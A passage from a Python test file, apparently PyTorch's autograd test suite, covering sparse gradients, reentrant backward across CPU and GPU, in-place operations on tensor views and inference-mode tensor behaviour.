[0, 3, 4],
[0, 2, 2],
], dtype=torch.long)
v1 = make_tensor([3, 2], dtype=dtype, device=device)
sparse_grad1 = torch.sparse_coo_tensor(i1, v1, size, dtype=dtype, device=device)
i2 = torch.tensor([
[0, 1, 3, 4],
[0, 1, 2, 2],
], dtype=torch.long)
v2 = make_tensor([4, 2], dtype=dtype, device=device)
sparse_grad2 = torch.sparse_coo_tensor(i2, v2, size, dtype=dtype, device=device)
dense_grad = torch.rand(size, device=device, dtype=dtype)
fn = FixedGradientFunction
# sparse first
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, sparse_grad1) + fn.apply(x, dense_grad) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
# dense first
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, dense_grad) + fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
# sparse only
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, sparse_grad1 + sparse_grad2)
# autograd tests via common_method_invocations don't allow input tensors to
# be sparse (RuntimeError: gradcheck expects all tensor inputs are dense when
# check_sparse_nnz is set to False.)
def test_sparse_mask_autograd(self, device):
tensor = torch.randn(3, requires_grad=True, device=device)
mask = torch.ones(3, device=device)
mask[1] = 0
mask = mask.to_sparse()
converted = tensor.sparse_mask(mask).to_dense()
converted.sum().backward()
self.assertEqual(tensor.grad, mask.to_dense())
def test_pyscalar_conversions(self, device):
def _test_pyscalar_conversions(t, integral_conv):
# integral -> integral
l = t(torch.zeros(1, 1, 1, dtype=torch.long))
pyscalar = -12345
l[0] = pyscalar
self.assertEqual(integral_conv(l), pyscalar)
# floating point -> floating point
f = Variable(t(torch.randn(1, 1, dtype=torch.double)))
pyscalar = -12345.1
f[0] = pyscalar
self.assertEqual(float(f), pyscalar)
f[0] = nan
self.assertTrue(math.isnan(float(f)))
f[0] = inf
self.assertEqual(float(f), inf)
f[0] = -inf
self.assertEqual(float(f), -inf)
# integral -> floating point
# check we can convert something that loses precision
pyscalar = 1234567890123456789
self.assertNotEqual(pyscalar, integral_conv(float(pyscalar)))
l[0] = pyscalar
self.assertEqual(float(l), float(pyscalar))
# floating point -> integral
f[0] = nan
self.assertRaises(ValueError, lambda: integral_conv(f[0]))
f[0] = inf
self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
f[0] = -inf
self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
f[0] = sys.float_info.max
self.assertEqual(integral_conv(f), sys.float_info.max)
# bool, nonzero
def test_nonzero(tensor, value, expected):
tensor[0] = value
self.assertEqual(expected, bool(tensor))
self.assertEqual(expected, True if tensor else False)
test_nonzero(l, 0, False)
test_nonzero(l, -2, True)
test_nonzero(f, 0.0, False)
test_nonzero(f, sys.float_info.min, True)
test_nonzero(f, nan, bool(nan))
test_nonzero(f, inf, bool(inf))
test_nonzero(f, -inf, bool(-inf))
_test_pyscalar_conversions(lambda x: x.to(device), lambda x: int(x))
@dtypesIfCUDA(torch.half, torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
@dtypes(torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
def test_set_requires_grad_only_for_floats(self, device, dtype):
def f1():
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad_()
def f2():
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad = True
def f3():
torch.ones(1, dtype=dtype, device=device, requires_grad=True)
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad = False # should always work
a.requires_grad_(False)
for f in [f1, f2, f3]:
if dtype.is_floating_point:
f()
else:
with self.assertRaisesRegex(RuntimeError, 'floating point', msg="dt: {} device: {}".format(a.dtype, a.device)):
f()
@onlyCUDA
def test_advanced_indexing_backwards_large(self, device):
# See https://github.com/pytorch/pytorch/issues/22843
n = (1 << 16)
x = torch.rand(n, 1, device=device, requires_grad=True)
a = x[:, [0]]
a.sum().backward()
self.assertEqual(x.grad, torch.ones(n, 1, device=device))
def test_advanced_indexing_backwards_memory_format(self, device):
# See https://github.com/pytorch/pytorch/issues/36956
shape = (2, 8, 1, 2)
i = torch.randint(1, shape, device=device).contiguous(memory_format=torch.channels_last)
x = torch.randn(shape, requires_grad=True, device=device)
x[i].sum().backward()
def _test_reentrant_parent_error_on_cpu(self, device):
t1 = torch.rand([3, 3], requires_grad=True)
t2 = torch.rand([3, 3], device=device, requires_grad=True)
t3 = torch.rand([3, 3], device=device, requires_grad=True)
# Parent graph cpu graph.
t4 = t1 * t1
t5 = TestAutograd.SimulateBackwardError.apply(t4)
# Child gpu graph (much longer than parent graph).
prev = t2 * t2
for i in range(10):
prev = prev * t2
reentrant_root = prev
class ReentrantFunc(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, grad):
# Reentrant backward in child will take much longer.
reentrant_root.backward()
return grad
# Parent gpu graph.
t6 = ReentrantFunc.apply(t3)
t7 = t6 * t6
# Parent graph will error out first, while child graph will continue executing.
with self.assertRaisesRegex(Exception, "Simulate error"):
torch.autograd.backward([t5.sum(), t7.sum()])
# No grads should be accumulated since child graph will stop execution
# after parent receives error.
self.assertIsNone(t2.grad)
self.assertIsNone(t1.grad)
self.assertIsNone(t3.grad)
@onlyCUDA
def test_reentrant_parent_error_on_cpu(self, device):
before = CudaMemoryLeakCheck.get_cuda_memory_usage()
# Run as separate function so that gc can clean up everything when we
# check for memory usage.
self._test_reentrant_parent_error_on_cpu(device)
# Wait for autograd thread to cleanup failed tasks.
after = CudaMemoryLeakCheck.get_cuda_memory_usage()
start = time.time()
while before != after and time.time() - start < 30:
time.sleep(0.1)
after = CudaMemoryLeakCheck.get_cuda_memory_usage()
self.assertEqual(before, after)
# TODO: see if these tests can be ported to OpInfos or moved to where's test suite
def test_where_functional(self, device):
x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
cond = mask_not_all_zeros((5, 5)).to(device=device)
def where(cond, x, y):
return torch.where(cond, x, y)
gradcheck(where, [cond, x, y], raise_exception=True)
gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, device=device)])
x = torch.randn(5, 1, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.randn(5, 5, 1, dtype=torch.double, device=device, requires_grad=True)
gradcheck(where, [cond, x, y], raise_exception=True)
gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, 5, device=device)])
def test_where_scalar(self, device):
x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
scalar = 4.
cond = mask_not_all_zeros((5, 5)).to(device=device)
def where_scalar_first(cond, x):
return torch.where(cond, scalar, x)
def where_scalar_second(cond, x):
return torch.where(cond, x, scalar)
gradcheck(where_scalar_first, (cond, x))
gradgradcheck(where_scalar_first, (cond, x))
gradcheck(where_scalar_second, (cond, x))
gradgradcheck(where_scalar_second, (cond, x))
@onlyCUDA
def test_free_unneeded_tensor(self, device):
x = torch.randn(2, 3, 10, 10, device=device, requires_grad=True)
m = torch.randn(1, 3, 1, 1, device=device)
z = x.sum()
base_mem = torch.cuda.memory_allocated()
z = ((x + 2) * m).sum()
end_mem = torch.cuda.memory_allocated()
# In the end the memory usage should remain equal, because neither of
# (x + 2) and ((x + 2) * m) should be kept alive for backward, while the
# previous allocation of z had the same size as the current one.
self.assertEqual(base_mem, end_mem)
@onlyCUDA
def test_pin_memory(self, device):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
self.assertEqual(x, x.pin_memory())
self.assertIsNot(x, x.pin_memory())
self.assertTrue(x.pin_memory().requires_grad)
gradcheck(lambda x: x.pin_memory(), [x])
gradgradcheck(lambda x: x.pin_memory(), [x])
@skipCUDAIfRocm
@onlyCUDA
def test_profiler_emit_nvtx(self, device):
# This test is not intended to ensure correctness of nvtx ranges.
# That would require something a great deal more complex (you'd have to create a
# profile in a subprocess, open it, and parse the sql somehow).
# This test is merely intended to catch if emit_nvtx breaks on construction.
a = torch.tensor([1, 2, 3], dtype=torch.float32, device=device)
with torch.cuda.profiler.profile():
with emit_nvtx():
a.add(1.0)
@onlyCUDA
def test_rnn_backward_to_input_but_not_parameters(self, device):
# this checks whether it is possible to not require
# weight parameters, but require inputs, see #7722
l = torch.nn.LSTM(2, 3).to(device)
for p in l.parameters():
p.requires_grad = False
s = torch.randn(1, 1, 2, requires_grad=True, device=device)
out, _ = l(s)
out.sum().backward()
self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
@deviceCountAtLeast(1)
def test_grad_assignment(self, devices):
x = torch.randn(5, 5, device=devices[0])
# Tests that the wrong type raises
with self.assertRaisesRegex(TypeError, "expected to be a Tensor or None"):
x.grad = 0
# Tests that the wrong shape raises
with self.assertRaises(RuntimeError):
x.grad = torch.randn(2, 2, device=devices[0])
# Tests that the wrong dtype raises
with self.assertRaises(RuntimeError):
x.grad = torch.randn(5, 5, dtype=torch.long, device=devices[0])
# Tests that self-assignment raises
with self.assertRaises(RuntimeError):
x.grad = x
# Tests device -> cpu grad assignment raises
if self.device_type != 'cpu':
with self.assertRaises(RuntimeError):
t_cpu = torch.rand(5, 5)
t_cpu.grad = torch.randn(5, 5, device=devices[0])
# Tests half type on CUDA
if self.device_type == 'cuda':
x = x.to(dtype=torch.half, device=devices[0])
x.grad = torch.zeros_like(x)
# Tests cross-device assignment raises
if len(devices) > 1:
x = torch.randn(5, 5, device=devices[0])
with self.assertRaises(RuntimeError):
x.grad = torch.randn(5, 5, device=devices[1])
@deviceCountAtLeast(1)
@dtypes(torch.float, torch.double)
def test_requires_grad_factory(self, devices, dtype):
fns = [torch.ones_like, torch.randn_like]
x = torch.randn(2, 3, dtype=dtype, device=devices[0])
for fn in fns:
for requires_grad in [True, False]:
output = fn(x, dtype=dtype, device=devices[0], requires_grad=requires_grad)
self.assertEqual(requires_grad, output.requires_grad)
self.assertIs(dtype, output.dtype)
self.assertEqual(devices[0], str(x.device))
@deviceCountAtLeast(2)
def test_unused_output_device(self, devices):
from torch.nn.parallel._functions import Broadcast
x = torch.randn(5, 5, dtype=torch.float, device=devices[0], requires_grad=True)
outputs = Broadcast.apply(list(range(len(devices))), x)
y = outputs[-1] * 2
y.sum().backward()
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(x.grad, torch.ones(5, 5) * 2)
@deviceCountAtLeast(2)
def test_backward_device(self, devices):
# check that current device matches the variable's device
device = [None]
class Identity(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.clone()
@staticmethod
def backward(ctx, grad_output):
device[0] = grad_output.device
return grad_output.clone()
v = torch.randn(1, device=devices[1], requires_grad=True)
Identity.apply(v).backward()
self.assertEqual(str(device[0]), devices[1])
@deviceCountAtLeast(2)
def test_inputbuffer_add_multidevice(self, devices):
input = torch.randn(1, device=devices[0], requires_grad=True)
output = input.to(device=devices[1]) + input.to(device=devices[1])
output.backward()
@onlyCPU
def test_copy_(self, device):
# At the time of writing this test, copy_ is not generated from native_functions.yaml
# there was a bug that bfloat16 was not recognized as floating.
x = torch.randn(10, device=device, requires_grad=True)
floating_dt = [dt for dt in get_all_dtypes() if dt.is_floating_point]
for dt in floating_dt:
y = torch.empty(10, device=device, dtype=dt)
y.copy_(x)
self.assertTrue(y.requires_grad)
z = x.to(torch.bfloat16)
self.assertTrue(z.requires_grad)
@onlyCUDA
def test_simple_reentrant_cross_device(self, device):
class ReentrantFunc(Function):
_cpu_mode = True
@staticmethod
def forward(ctx, x):
return x * (x + 2)
@staticmethod
def backward(ctx, grad_output):
with torch.enable_grad():
if ReentrantFunc._cpu_mode:
new_param = torch.randn(2, 2, requires_grad=True)
(new_param ** 2).sum().backward()
else:
new_param = torch.randn(2, 2, device=device, requires_grad=True)
(new_param ** 2).sum().backward()
return grad_output
# Reentrant starts on GPU thread, finishs on GPU thread
x = torch.randn(2, 2, device=device, requires_grad=True)
out = ReentrantFunc.apply(x)
out.sum().backward()
# Reentrant starts on CPU thread, finishs on GPU thread
x = torch.randn(2, 2, requires_grad=True)
# set ReentrantFunc node to GPU to emit tasks to GPU queue
ReentrantFunc._cpu_mode = False
out = ReentrantFunc.apply(x)
out.sum().backward()
# Reentrant starts on GPU thread, finishs on CPU thread
x = torch.randn(2, 2, device=device, requires_grad=True)
# set ReentrantFunc node to CPU to emit tasks to CPU queue
ReentrantFunc._cpu_mode = True
out = ReentrantFunc.apply(x)
out.sum().backward()
@onlyCUDA
def test_cross_device_reentrant_autograd(self, device):
# Output on gpu so that this task will be associated with the gpu thread
def fn_on_gpu(inp):
# Artificially increase the priority of the next op to make sure it runs
# as soon as we reach it before the ops of branch1.
dummy = inp * 2 * 2 * 2 * 2
return inp.to(device=device)
def parent_on_cpu(inp):
# Slow branch of ops on gpu so that the work queue for the gpu thread
# won't empty too quickly. They also have smaller priorities than the
# ones created by fn_on_gpu
branch1 = inp.to(device=device)
branch1 = branch1 / branch1
branch1 = branch1 / branch1
branch1 = branch1 / branch1
# Perform checkpoint on cpu tensors. So the last op performed in the reentrant
# autograd is an AccumulateGrad that runs on the cpu thread for the gpu thread.
# So the cpu thread will notify the gpu thread with an empty NodeTask.
branch2 = checkpoint(fn_on_gpu, inp)
out = branch2 + branch1
return out
inp = torch.rand(2, requires_grad=True)
out = parent_on_cpu(inp)
# This will segfault if the empty NodeTask is not handled properly in the
# gpu thread ReadyQueue
out.sum().backward()
def test_inplace_on_view_backprop_base(self, device):
# modify view and back-prop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v1.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [1, 1]])
def test_inplace_on_view_backprop_view_of_view(self, device):
# modify view and backprop through view-of-view
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = x.narrow(0, 0, 1)
v1.mul_(2)
v2.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [0, 0]])
def test_inplace_on_view_of_view(self, device):
# modify view-of-view and backprop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1]])
def test_inplace_on_view_then_no_grad(self, device):
# Perform an in-place operation on a view of a non-leaf variable.
a = torch.ones(3, 1, dtype=torch.double, device=device, requires_grad=True)
b = a * 2
c = b.view_as(b)
c[0][0] = 3
# Force a graph update with grad disabled.
with torch.no_grad():
c.grad_fn
c.sum().backward()
def test_inplace_on_view_gradcheck(self, device):
# gradcheck modifications to views
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
x.narrow(1, 2, 2).narrow(0, 1, 2).mul_(b)
x.narrow(1, 0, 2).narrow(0, 1, 2).mul_(b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_multiple_outputs(self, device):
root = torch.arange(9., dtype=torch.double).reshape(3, 3).requires_grad_()
x = root.clone()
v1 = x.unbind()
with self.assertRaises(RuntimeError):
v1[0].mul_(2)
def test_inplace_on_view_of_multiple_output_view(self, device):
a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
b = a.unbind(0)
c = b[0].view_as(b[0])
with self.assertRaises(RuntimeError):
c.mul_(2)
def test_inplace_multiple_output_view_of_view(self, device):
a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
b = a.view_as(a)
c = b.unbind(0)
with self.assertRaises(RuntimeError):
c[0].mul_(2)
def test_inplace_on_view_makes_base_require_grad(self, device):
# in-place modification to view makes base require grad
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=False)
b = torch.randn(4, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
self.assertFalse(x.requires_grad)
x.narrow(1, 2, 2).mul_(b)
self.assertTrue(x.requires_grad)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_backprop_view(self, device):
# modify view and backprop through view
a = torch.tensor([2., 5.], device=device, requires_grad=False)
b = torch.tensor([3.], device=device, requires_grad=True)
res = a.narrow(0, 1, 1).mul_(b)
res.sum().backward()
self.assertEqual(b.grad.tolist(), [5])
self.assertIsNone(a.grad)
def test_inplace_on_view_modify_base(self, device):
# Test that an in-place operation on a base that forced it to require
# grad also forces any previous views to require grad and backprop
# correctly
r = torch.ones(1, dtype=torch.double, device=device, requires_grad=True)
def fn(r):
x = torch.ones(5, dtype=torch.double, device=device)
v = x.select(0, 1)
self.assertFalse(v.requires_grad)
self.assertIsNone(v.grad_fn)
x.add_(r) # v is now dependent on r due to the in-place op on x
self.assertTrue(v.requires_grad)
return v
gradcheck(fn, [r])
gradgradcheck(fn, [r])
def test_inplace_on_view_python(self, device):
# in-place modifications of Python-autograd created view
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
class PyAdd(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y):
ctx.mark_dirty(x)
x.add_(y)
return x
@staticmethod
def backward(ctx, grad):
return grad, grad
def func(root, b):
x = root.clone()
PyAdd.apply(x.narrow(1, 2, 2).narrow(0, 1, 2), b)
PyAdd.apply(x.narrow(1, 0, 2).narrow(0, 1, 2), b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_non_contig(self, device):
root = torch.ones(2, 3, 2, device=device).select(2, 1).t().requires_grad_(True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1], [1, 1]])
def test_inplace_on_view_multi_output_unsafe(self, device):
for f in [lambda t: t.unsafe_split(1),
lambda t: t.unsafe_split_with_sizes((1, 1, 1)),
lambda t: t.unsafe_chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
s1.mul_(s2)
s1.sum().backward()
def test_inplace_on_view_multi_output_safe(self, device):
for f in [lambda t: t.split(1),
lambda t: t.split_with_sizes((1, 1, 1)),
lambda t: t.chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
error_msg = 'This view is the output of a function that returns multiple views.'
with self.assertRaisesRegex(RuntimeError, error_msg):
s1.mul_(s2)
def test_mv_grad_stride_0(self, device):
# Reference: https://github.com/pytorch/pytorch/issues/38315
mat = torch.randn(2, 2, dtype=torch.double, device=device)
vec = torch.randn(1, dtype=torch.double, device=device).requires_grad_(True)
def fn(vec):
# Expand inside the function to make sure the input to
# gradcheck does not have overlapping memory
vec = vec.expand(2)
return (mat @ vec).sum()
gradcheck(fn, (vec))
gradgradcheck(fn, (vec))
@onlyCUDA
def test_gradcheck_input_output_different_device(self, device):
x = torch.ones((1,), dtype=torch.double, device="cuda", requires_grad=True)
gradcheck(lambda x: x.to("cpu"), (x,))
x = torch.ones((1,), dtype=torch.double, device="cpu", requires_grad=True)
gradcheck(lambda x: x.to("cuda"), (x,))
def test_strided_leaf_grad_layout(self, device):
# (1) If leaf is non-overlapping and dense, grad's layout should match its leaf.
for fmt_a in (torch.contiguous_format, torch.channels_last):
for fmt_b in (torch.contiguous_format, torch.channels_last):
a = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_a)
b = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_b)
a.requires_grad_()
b.requires_grad_()
# checks (1) for broadcasted gradients
a.sum().backward()
self.assertEqual(a.grad.stride(), a.stride())
b.sum().backward()
self.assertEqual(b.grad.stride(), b.stride())
# checks (1) for non-broadcasted gradients
a.grad = None
b.grad = None
(a * b).sum().backward()
self.assertEqual(a.grad.stride(), a.stride())
self.assertEqual(b.grad.stride(), b.stride())
# (2) If leaf isn't dense, checks that grads are rowmajor contiguous.
c = torch.empty_strided((2, 2), (4, 2), device=device).copy_(torch.rand((2, 2), device=device))
c.requires_grad_()
d = torch.rand((2, 2), device=device)
# checks (2) for broadcasted gradients
c.sum().backward()
self.assertEqual(c.grad.stride(), (2, 1))
# checks (2) for non-broadcasted gradients
c.grad = None
(c * d).sum().backward()
self.assertEqual(c.grad.stride(), (2, 1))
def test_copy_r_to_c(self, device):
out_c = torch.empty(3, 2, dtype=torch.cdouble, device=device)
inp_r = torch.randn(3, 2, dtype=torch.double, device=device,
requires_grad=True)
def do_test():
out_c.copy_(inp_r)
out_c.sum().backward()
self.assertEqual(inp_r.grad, torch.ones_like(inp_r))
self.assertNotWarn(do_test)
def test_non_differentiable_ops(self, device):
# Just make sure the op doesn't raise an error
# and resulting tensor has requires_grad=False.
x = torch.tensor([[1, 2], [3, 4.]], requires_grad=True, device=device)
out = torch.isin(x, torch.tensor([2, 3], device=device))
self.assertFalse(out.requires_grad)
x = torch.randn(3, 3, requires_grad=True)
out = torch.signbit(x)
self.assertFalse(out.requires_grad)
def test_warning_in_backward(self, device):
# Test warning during backward are always propagated as python warnings (gh-50209)
# NOTE: For device=cuda, warning gets propagated from a worker thread
a = torch.zeros((), device=device, requires_grad=True)
b = torch._C._nn._test_warn_in_autograd(a)
with self.assertWarnsRegex(UserWarning, "Warn from backward"):
b.backward()
class TestAutogradInferenceMode(TestCase):
def _is_inference_tensor(self, tensor):
try:
err_msg = "Inference tensors do not track version counter"
with self.assertRaisesRegex(RuntimeError, err_msg):
tensor._version
return True
except AssertionError as e:
return False
def test_inference_mode_context_manager(self):
self.assertFalse(torch.is_inference_mode_enabled())
with torch.inference_mode():
self.assertTrue(torch.is_inference_mode_enabled())
with torch.inference_mode(False):
self.assertFalse(torch.is_inference_mode_enabled())
self.assertTrue(torch.is_inference_mode_enabled())
self.assertFalse(torch.is_inference_mode_enabled())
def test_inference_mode_decorator(self):
@torch.inference_mode()
def func(x):
self.assertTrue(torch.is_inference_mode_enabled())
return x * x
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
d = func(c)
self.assertTrue(torch.is_inference(d))
self.assertFalse(d.requires_grad)
def test_inference_mode_tensor_creation(self):
with torch.inference_mode():
# new tensors created through constructors are inference tensors
c = torch.ones(1, 2, 3)
self.assertFalse(c.requires_grad)
self.assertTrue(torch.is_inference(c))
# requires_grad doesn't change inference tensor behavior in InferenceMode
tmp = torch.ones(1, 2, 3, requires_grad=True)
self.assertTrue(tmp.requires_grad)
self.assertTrue(torch.is_inference(tmp))
tmp = torch.ones(1, 2, 3).requires_grad_(False)
self.assertFalse(tmp.requires_grad)
self.assertTrue(torch.is_inference(tmp))
def test_inference_mode_existing_autograd_session(self):
s = torch.ones(1, 2, 3, requires_grad=True)
a = s.clone()
# `a` gets saved outside of inference mode
out = a * a
with torch.inference_mode():
a.add_(2)
self.assertFalse(torch.is_inference(a))
# tensors created outside of inference mode aren't
# inference tensors, so they will still have their
# version counters tracked
err_msg = ("one of the variables needed for gradient computation has been "
"modified by an inplace operation")
with self.assertRaisesRegex(RuntimeError, err_msg):
out.backward(torch.ones_like(out))
def test_inference_mode_inf_tensor_in_inf_mode_functional_op(self):
def functional_op(x):
return x * x
with torch.inference_mode():
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# performing a non-view operation produces a inference tensor
# that does not require grad
func_out = functional_op(c)
self.assertTrue(torch.is_inference(func_out))
self.assertFalse(func_out.requires_grad)
def test_inference_mode_inf_tensor_in_inf_mode_inplace_op(self):
@torch.inference_mode()
def run_test(fn):
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# after performing inplace operation, tensor is still
# an inference tensor
fn(c)
self.assertTrue(torch.is_inference(c))
self.assertEqual(c.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_inf_mode_view_op(self):
with torch.inference_mode():
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# perform view operation produces inference tensor
# that does not require grad
view_out = c.view(-1)
self.assertTrue(torch.is_inference(view_out))
self.assertFalse(view_out.requires_grad)
def test_inference_mode_inf_tensor_in_normal_mode_functional_op(self):
def functional_op(x):
return x * x
for requires_grad in (True, False):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
func_out = functional_op(c)
self.assertFalse(torch.is_inference(func_out))
self.assertFalse(func_out.requires_grad)
self.assertTrue(func_out.is_leaf)
def test_inference_mode_inf_tensor_in_normal_mode_inplace_op(self):
def run_test(fn):
for requires_grad in (False, True):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
if requires_grad:
# leaf variable that requires grad is being used in an inplace
# operation when requires_grad=True
pass
else:
err_msg = "Inplace update to inference tensor outside InferenceMode"
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(c)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_normal_mode_view_op(self):
for requires_grad in (True, False):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
out = c.view(-1)
self.assertTrue(torch.is_inference(out))
self.assertFalse(out.requires_grad)
self.assertFalse(out._is_view())
self.assertTrue(out.is_leaf)
def test_normal_tensor_inplace_output_in_inference_mode(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace -> view
view_out = a.view(-1)
self.assertFalse(torch.is_inference(view_out))
self.assertEqual(view_out.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_inplace_output_in_normal_mode(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace -> view
view_out = a.view(-1)
self.assertFalse(torch.is_inference(view_out))
self.assertEqual(view_out.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_view_output_in_inference_mode(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
out = a.view(-1)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
self.assertTrue(out._is_view())
# view -> view
tmp = out.view(-1)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
self.assertTrue(tmp._is_view())
self.assertTrue(tmp.is_leaf)
# view -> view -> inplace
self.assertTrue(torch.is_inference_mode_enabled())
tmp.add_(2)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
# Accessing is_leaf in python tries to update grad_fn and raises:
# A view was created in inference mode and its base or
# another view of its base has been modified inplace in normal mode
# tmp.is_leaf
self.assertEqual(a._version, tmp._version)
def test_normal_tensor_view_output_in_normal_mode(self):
def functional_op(x):
return x * x
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
out = a.view(-1)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
self.assertTrue(out._is_view())
self.assertTrue(out.is_leaf)
tmp = functional_op(out)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
if requires_grad:
err_msg = "A view was created in inference mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, err_msg):
out.add_(2)
pass
else:
out.add_(2)
tmp = out.view(2, 3)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
def test_mix_inference_and_normal_tensor_functional_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# add is safe since it doesn't save any variable for backward
out = c.add(s)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
if requires_grad:
# leaf inference tensor with requires_grad=True can still have gradient
out.backward(torch.ones_like(out))
self.assertEqual(c.grad, torch.ones_like(c))
if requires_grad:
err_msg = "Inference tensors cannot be saved for backward"
with self.assertRaisesRegex(RuntimeError, err_msg):
c * s
# inference tensor in TensorList input
inputs = [s, c]
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.stack(inputs)
